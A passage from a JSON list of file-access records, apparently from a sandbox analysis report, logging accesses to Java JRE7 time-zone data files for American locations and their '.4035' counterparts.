(x86)\\java\\jre7\\lib\\zi\\america\\miquelon.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Pangnirtung", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\pangnirtung", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Paramaribo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\paramaribo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Phoenix", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\phoenix", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rankin_Inlet", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rankin_inlet", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Recife", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\recife", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Regina", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\regina", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sao_Paulo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files 